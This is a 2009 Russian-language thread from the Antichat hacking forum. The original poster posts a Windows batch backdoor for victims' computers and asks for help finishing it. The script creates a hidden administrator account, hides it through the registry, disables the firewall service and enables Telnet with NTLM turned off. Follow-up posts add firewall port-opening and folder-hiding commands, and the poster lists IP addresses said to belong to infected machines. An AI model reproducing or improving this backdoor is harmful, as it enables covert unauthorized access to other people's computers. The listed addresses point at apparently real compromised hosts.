Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Что не хватает в bat"нике ? |

19.06.2009, 00:35
|
|
Участник форума
Регистрация: 01.01.2009
Сообщений: 138
Провел на форуме: 817404
Репутация:
82
|
|
Что не хватает в bat"нике ?
Телнет - сетевой протокол для работы в удаленной системе в терминальном
режиме(т.е. режиме командной строки). Все делается "ручками", мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал,
позволяющая нам подключаться к удаленным компьютерам.
Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у жертвы. Делать это можно с помощью команд cmd
Для этого напишим батник :
PHP код:
chcp 1251
net user SUPPORT_388945a0 /delete
net user qwerty 123 /add
net localgroup Администраторы qwerty /add
net localgroup Administrators qwerty /add
net localgroup Пользователи SUPPORT_388945a0 /del
REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "qwerty" /t REG_DWORD /d 0 /f
net stop sharedaccess
sc config sharedaccess start= disabled
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Всё вроде верно, но перестало работать
в том что комп включен уверен на 100%
можт кто блочит, но не все же компы махом 0_o
и адреса приходят
порыскаав по нету нашол команду netsh firewall
PHP код:
netsh firewall add portopening TCP 972 System
или
PHP код:
Netsh firewall add portopening protocol=tcp port=972 mode=enable scope=all
незнаю как правильно и многое ли ето даст
+ хочется добавить скрытость на папку с юзером в документс анд сеттингс
помоему команда
PHP код:
attrib +s +h C:\Documents and Settings\qwerty >nul
должна сработать
Отчётов уже огромный список а войти не могу =(
кто нибудь может помоч мне дописать этого бакдора до конца, учтя все мелочи стукните в аску 2218982
зарание спасибо
|
|
|

19.06.2009, 00:39
|
|
Участник форума
Регистрация: 01.01.2009
Сообщений: 138
Провел на форуме: 817404
Репутация:
82
|
|
вот нашол что вместо
PHP код:
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
лучше будет
PHP код:
sc config tlntsvr start= auto >nul
tlntadmn config port=972 sec=-NTLM
net start Telnet >nul
|
|
|

19.06.2009, 09:29
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме: 6828219
Репутация:
2274
|
|
Ябы уже лучше открывалбы удалёный рабочий стол, тоже 1 батником открывается, токо гуглить надо
|
|
|

19.06.2009, 09:58
|
|
Познавший АНТИЧАТ
Регистрация: 22.11.2007
Сообщений: 1,822
Провел на форуме: 4468361
Репутация:
1549
|
|
что значит открывается одним батником? На сервере что, сидит блонда, которая будет запускать эти батники, или у вас есть админский доступ к этим серверам? Автор, если затираешь айпишник, то затирать нужно последние цифры айпишника, а не первые.
|
|
|

19.06.2009, 13:40
|
|
Участник форума
Регистрация: 01.01.2009
Сообщений: 138
Провел на форуме: 817404
Репутация:
82
|
|
Сообщение от Cthulchu
что значит открывается одним батником? На сервере что, сидит блонда, которая будет запускать эти батники, или у вас есть админский доступ к этим серверам?
ну это уже другая тема, с этим проблем нету)
Автор, если затираешь айпишник, то затирать нужно последние цифры айпишника, а не первые.
да какая разница....
ВСЁРАВНО СБОЙ
у мя их уж список набрался =( ток они сдохли !
Код:
.....................
77.40.12.36
80.90.236.240
82.200.252.13
82.207.38.182
82.207.63.63
91.124.246.64
92.115.31.129
92.46.216.175
92.46.218.171
93.80.114.100
93.80.114.100
94.41.141.100
95.52.219.149
95.52.220.11
95.52.23.76
95.59.37.124
....................
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|